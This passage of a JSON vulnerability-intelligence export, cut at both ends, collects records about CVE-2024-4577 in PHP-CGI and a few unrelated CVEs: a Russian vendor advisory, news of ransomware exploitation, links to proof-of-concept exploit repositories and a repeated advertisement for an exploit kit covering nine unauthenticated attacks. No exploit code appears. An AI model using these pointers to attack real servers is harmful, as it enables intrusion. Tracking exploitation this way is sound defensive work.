\u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 PHP-CGI.\n\nPHP-CGI \u2014 \u044d\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 PHP-\u0444\u0430\u0439\u043b\u043e\u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043c\u043e\u0434\u0443\u043b\u044f mod_cgi, \u043a\u043e\u0433\u0434\u0430 \u043a\u0430\u0436\u0434\u044b\u0439 PHP-\u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u043c.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043d\u043e\u0432\u044b\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u0442\u0430\u043a\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0442\u0435\u0445\u043d\u0438\u043a\u0438 PHP CGI Argument Injection. \u041e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043e\u0431\u043e\u0439\u0442\u0438 \u0437\u0430\u0449\u0438\u0442\u0443 \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2012-1823, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043b\u0438\u043d\u0433\u0432\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0438, \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0439 PHP-\u043a\u043e\u0434 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f.\n\nCVSS \u043f\u043e\u043a\u0430 \u043d\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0430. \u041f\u043e \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044f\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0446\u0435\u043d\u043a\u0430 \u0432\u0430\u0440\u044c\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043e\u0442 9,8 \u0434\u043e 10.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 PHP, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows:\n\u2014 PHP 8.3 < 8.3.8;\n\u2014 PHP 8.2 < 8.2.20;\n\u2014 PHP 8.1 < 8.1.29.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0443\u0436\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b\u0438 \u0438 \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0438 \u0440\u0430\u0431\u043e\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Windows \u0441 \u043b\u043e\u043a\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f\u043c\u0438:\n\u2014 Traditional Chinese (Code Page 950);\n\u2014 Simplified Chinese (Code Page 936);\n\u2014 Japanese (Code Page 932).\n\n\u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 PHP-CGI. \u0422\u0430\u043a\u0436\u0435 \u0432 \u044d\u0442\u043e\u043c \u043f\u043e\u043c\u043e\u0436\u0435\u0442 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u044d\u043a\u0440\u0430\u043d \u0437\u0430\u0449\u0438\u0442\u044b \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 BI.ZONE WAF.\n\n\u0411\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u0435 \u043a\u043e\u043c\u0430\u043d\u0434 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0438 BI.ZONE WAF \u043c\u044b \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u0438 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438. \u041e\u043d\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c \u0432 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0433\u0430\u0434\u0436\u0435\u0442\u044b \u043e\u0431\u0445\u043e\u0434\u0430 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 CVE-2012-1823 \u0432 \u0440\u0430\u0437\u043d\u044b\u0445 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0430\u0445.\u00a0\u042d\u0442\u043e \u043f\u043e\u043c\u043e\u0436\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0442\u0435\u0445\u043d\u0438\u043a\u0443 \u0430\u0442\u0430\u043a\u0438 \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c.", "creation_timestamp": "2024-06-07T16:02:55.000000Z"}, {"uuid": "0c2626d6-de81-4e86-9554-11bce2d36026", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/HackingInsights/5843", "content": "\u200aMultiple threat actors exploit PHP flaw CVE-2024-4577 to deliver malware\n\nhttps://securityaffairs.com/165586/hacking/php-flaw-cve-2024-4577-actively-exploited.html", "creation_timestamp": "2024-07-12T13:28:25.000000Z"}, {"uuid": "9e00470c-2389-4c0f-a054-ca70c634ce56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/7227", "content": "\ud83d\udea8CVE-2024-4577 RCE Exploit; PHP CGI Argument Injection\n\nhttps://darkwebinformer.com/cve-2024-4577-rce-exploit-php-cgi-argument-injection/", "creation_timestamp": "2024-11-15T21:09:42.000000Z"}, {"uuid": "a2ac3548-fddf-40a5-ad38-48c2b0e506d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/6917", "content": "https://github.com/BTtea/CVE-2024-4577-RCE-PoC", "creation_timestamp": "2024-11-12T20:29:53.000000Z"}, {"uuid": "11bb38ed-e29d-4378-9373-5e8f851089d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/HackingInsights/5830", "content": "\u200aCritical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild\n\nhttps://cybersecuritynews.com/php-vulnerability-exploited/", "creation_timestamp": "2024-07-12T13:28:17.000000Z"}, {"uuid": "d4c43b57-b90f-4581-8240-9cb1b35e84e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45772", "type": "seen", "source": "https://t.me/cvedetector/6648", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45772 - Apache Lucene Replicator Deserialization of Untrusted Data Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45772 \nPublished : Sept. 30, 2024, 9:15 a.m. | 21\u00a0minutes ago \nDescription : Deserialization of Untrusted Data vulnerability in Apache Lucene Replicator.  \n  \nThis issue affects Apache Lucene's replicator module: from 4.4.0 before 9.12.0.  \nThe deprecated org.apache.lucene.replicator.http package is affected.  \nThe org.apache.lucene.replicator.nrt package is not affected.  \n  \nUsers are recommended to upgrade to version 9.12.0, which fixes the issue.  \n  \nJava serialization filters (such as\u00a0-Djdk.serialFilter='!*' on the commandline) can mitigate the issue on vulnerable versions without impacting functionality. \nSeverity: 5.1 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"30 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-30T11:38:32.000000Z"}, {"uuid": "f2cc0b70-be09-44e8-aaa3-1a38fb151421", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/HackingInsights/5825", "content": "\u200aCritical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild\n\nhttps://cybersecuritynews.com/php-vulnerability-cve-2024-4577/", "creation_timestamp": "2024-07-12T13:28:16.000000Z"}, {"uuid": "8293ec6e-3635-428a-a136-3f9c0d4a1733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45773", "type": "seen", "source": "https://t.me/cvedetector/6534", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45773 - Facebook Thrift Use-After-Free Code Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45773 \nPublished : Sept. 27, 2024, 2:15 p.m. | 28\u00a0minutes ago \nDescription : A use-after-free vulnerability involving upgradeToRocket requests can cause the application to crash or potentially result in code execution or other undesirable effects. This issue affects Facebook Thrift prior to v2024.09.09.00. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"27 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-27T16:43:50.000000Z"}, {"uuid": "595140d8-dbd4-4b2f-9c5d-43f700be3df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/3564", "content": "\ud83d\udea8PHP CGI Argument Injection (CVE-2024-4577) RCE\n\nhttps://darkwebinformer.com/php-cgi-argument-injection-cve-2024-4577-rce/", "creation_timestamp": "2024-09-13T16:32:41.000000Z"}, {"uuid": "14bd8edf-ec04-4f00-96dc-610cf8763a95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/5411", "content": "\ud83d\udea8CVE-2024-4577: PHP CGI Argument Injection Scanner and Exploit\n\nhttps://darkwebinformer.com/cve-2024-4577-php-cgi-argument-injection-scanner-and-exploit/", "creation_timestamp": "2024-10-14T19:37:44.000000Z"}, {"uuid": "dfe81472-3451-46e5-82b1-e34c65fd8828", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45771", "type": "seen", "source": "https://t.me/cvedetector/5009", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45771 - RapidCMS SQL Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45771 \nPublished : Sept. 6, 2024, 10:15 p.m. | 35\u00a0minutes ago \nDescription : RapidCMS v1.3.1 was discovered to contain a SQL injection vulnerability via the password parameter at /resource/runlogin.php. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"07 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-07T00:58:05.000000Z"}, {"uuid": "bd7c84d5-ad57-489f-9c1d-d0d9691ec46c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45770", "type": "seen", "source": "https://t.me/cvedetector/6047", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45770 - \"Performance Co-Pilot pmpost Elevation of Privilege Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-45770 \nPublished : Sept. 19, 2024, 9:15 a.m. | 32\u00a0minutes ago \nDescription : A vulnerability was found in Performance Co-Pilot (PCP). This flaw can only be exploited if an attacker has access to a compromised PCP system account. The issue is related to the pmpost tool, which is used to log messages in the system. Under certain conditions, it runs with high-level privileges. \nSeverity: 4.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"19 Sep 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-09-19T11:58:37.000000Z"}, {"uuid": "8b500f74-172d-4ace-bf82-9e3150113fdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/YFKIq92mIsWn1g1FD3fnMN5CqtRiMwl2LWZ6s_90VkdZFSU", "content": "", "creation_timestamp": "2024-06-20T09:49:15.000000Z"}, {"uuid": "7520912a-2653-48a6-bd45-b20ba672e04d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/HackingInsights/10761", "content": "\u200aUnseen Msupedge Malware Exploits PHP Flaw CVE-2024-4577 in Taiwanese University Cyberattack\n\nhttps://securityonline.info/unseen-msupedge-malware-exploits-php-flaw-cve-2024-4577-in-taiwanese-university-cyberattack/", "creation_timestamp": "2024-08-21T06:52:17.000000Z"}, {"uuid": "3c96847c-28df-4efb-b9cd-4b045f17df95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/ton618cyber/2704", "content": "PHP-CGI RCE Flaw Exploited in Attacks on Japan's Tech, Telecom, and E-Commerce Sectors\n\nHackers exploit CVE-2024-4577 to breach Japanese firms, leveraging Cobalt Strike, PowerShell, and advanced persistence techniques.\n\nThe Hacker News | thehackernews.com \u2022 Mar 7, 2025", "creation_timestamp": "2025-03-07T16:08:54.000000Z"}, {"uuid": "f5259a1c-4c91-4a72-83c3-895c931f5b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/691", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aServerside Template Injection (SSTI) RCE - THM challenge \\\"whiterose\\\"    \nURL\uff1ahttps://github.com/l0n3m4n/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-05T20:57:54.000000Z"}, {"uuid": "0a29fff4-3e29-4849-b5f9-5e760ebdd5d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/sGwrFvzMhVfKYihSUB0dY3749vQ3VJnbJi96ACjWKJhiWQ", "content": "", "creation_timestamp": "2025-03-07T22:03:41.000000Z"}, {"uuid": "9e32ce1e-22f7-4673-873d-5c966fd860a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "Telegram/Dn8FXuv7XUCFW_KB5ErGykXzVNXSf__s33QH2_H1WEIXww", "content": "", "creation_timestamp": "2025-03-07T12:06:42.000000Z"}, {"uuid": "d2e91ac2-9c14-45cc-b8a2-9e8766e9c9b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/454", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2024-09-07T16:14:23.000000Z"}, {"uuid": "eb00844a-aa64-4d15-94ec-26b4d639d82a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/Ss0KnruDSXLy5CETLMR6y2mpphRaRyfay9MVRfKcCl7o8CE", "content": "", "creation_timestamp": "2024-06-08T10:44:50.000000Z"}, {"uuid": "69987c70-a4b7-4de5-93ed-27020faf49e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "Telegram/Uodj1qzr829FCpwe9n-Z_pwAcU3oKpzoBIoKIOYUmkVJvQ", "content": "", "creation_timestamp": "2024-06-08T12:33:47.000000Z"}, {"uuid": "b1483296-4108-4ef9-bd84-a2fc5035a760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "Telegram/cnrk9IHHG8GmTSp6b341bvNl98Ju0a-1orFNcOPUnDl0ig", "content": "", "creation_timestamp": "2024-07-11T08:08:22.000000Z"}, {"uuid": "771362b5-2498-4a5c-859d-8c024a0c955d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/Blackhat_Officials/1033", "content": "No Way, PHP Strikes Again! (CVE-2024-4577) - Fortunately, for defenders, the bug has only been exploited on Windows-based PHP installations (where PHP is specifically used in CGI mode), under some specific locales:\nhttps://ift.tt/08Sqewr\n\nDiscuss on Reddit: https://ift.tt/6ATis8X\n@blueteamalerts", "creation_timestamp": "2024-06-08T19:45:07.000000Z"}, {"uuid": "299b222d-fbb0-4eb6-bb32-27ad83388e00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/446", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-06-12T23:29:42.000000Z"}, {"uuid": "f7f1bf94-22a6-4a60-8957-49353aa6cb57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/ton618cyber/7164", "content": "PHP-CGI RCE Flaw Exploited in Attacks on Japan's Tech, Telecom, and E-Commerce Sectors\n\nHackers exploit CVE-2024-4577 to breach Japanese firms, leveraging Cobalt Strike, PowerShell, and advanced persistence techniques.\n\nThe Hacker News | thehackernews.com \u2022 Mar 7, 2025", "creation_timestamp": "2025-03-07T16:08:53.000000Z"}, {"uuid": "d0007fc8-3593-408d-b313-ddbd38865680", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/dogFJAjqT38S9PywBZax6Og0sENPHM7XpSqrla5gmze8-cE", "content": "", "creation_timestamp": "2024-06-12T05:17:48.000000Z"}, {"uuid": "1e4a3497-be58-4c04-acc5-60d159b9107f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/97311", "content": "New PHP vulnerability CVE-2024-4577 puts Windows servers at risk of remote code execution\n\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE/tree/main", "creation_timestamp": "2024-09-03T19:49:51.000000Z"}, {"uuid": "3b0630f6-00e7-48a6-8cca-a0c33fddeb8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/1967", "content": "\u200aResearchers Detail Critical PHP Flaw CVE-2024-4577 with PoC Exploit Code\n\nhttps://securityonline.info/researchers-detail-critical-php-flaw-cve-2024-4577-with-poc-exploit-code/", "creation_timestamp": "2024-06-09T12:22:54.000000Z"}, {"uuid": "2226449a-e2f7-45aa-975a-122d4f273bdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/HackingInsights/2405", "content": "TellYouThePass Ransomware Attack Detection: Hackers Exploit CVE-2024-4577 to Install Web Shells and Drop Malware\u00a0\nhttps://ift.tt/YGH2sXl", "creation_timestamp": "2024-06-13T18:01:48.000000Z"}, {"uuid": "8a8aa1b9-0ec1-4115-bb43-b0d345e22f41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/HackingInsights/5969", "content": "\u200aHackers are actively exploiting PHP RCE vulnerability (CVE-2024-4577)\n\nhttps://securityonline.info/hackers-are-actively-exploiting-php-rce-vulnerability-cve-2024-4577/", "creation_timestamp": "2024-07-13T09:55:36.000000Z"}, {"uuid": "578563b5-5660-4d48-b62f-8c84f38a4465", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/HackingInsights/2166", "content": "\u200aPHP Vulnerability (CVE-2024-4577) Actively Exploited in TellYouThePass Ransomware Attacks\n\nhttps://securityonline.info/php-vulnerability-cve-2024-4577-actively-exploited-in-tellyouthepass-ransomware-attacks/", "creation_timestamp": "2024-06-11T13:54:52.000000Z"}, {"uuid": "0395eff7-0ac8-45dc-9af2-64a996b48a04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/HackingInsights/2043", "content": "Attacker Probing for New PHP Vulnerablity CVE-2024-4577, (Sun, Jun 9th)\nhttps://ift.tt/p079NMw", "creation_timestamp": "2024-06-10T05:50:55.000000Z"}, {"uuid": "f42bd4df-8b9f-4105-935e-bce0358383cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/1898", "content": "\u200aCVE-2024-4577: Critical PHP Vulnerability Exposes Millions of Servers to RCE\n\nhttps://securityonline.info/cve-2024-4577-critical-php-vulnerability-exposes-millions-of-servers-to-rce/", "creation_timestamp": "2024-06-07T13:52:10.000000Z"}, {"uuid": "75b8750e-ce87-48a2-ab6a-089d6d819c00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/J5_joeuQLAfGYlTgpSDJB7ukyhYm4uy1b-PentqlOVesyDyE", "content": "", "creation_timestamp": "2025-01-18T20:31:39.000000Z"}, {"uuid": "da7d26da-a558-48bb-8467-21e935aed14e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/leak503/506", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & 